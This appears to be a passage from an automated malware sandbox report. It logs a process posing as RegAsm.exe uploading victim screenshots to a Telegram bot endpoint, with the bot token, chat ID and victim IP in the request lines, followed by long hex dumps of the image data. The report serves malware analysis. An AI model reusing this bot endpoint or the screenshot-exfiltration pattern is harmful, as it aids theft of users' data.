                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:44 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:45 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:45 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1832
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.449774149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:47 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd32a01899557c
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 30 31 38 39 39 35 35 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd32a01899557cContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:47 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:48 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:48 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.449776149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:49 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd32cab7b3ac2f
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 61 62 37 62 33 61 63 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd32cab7b3ac2fContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:49 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
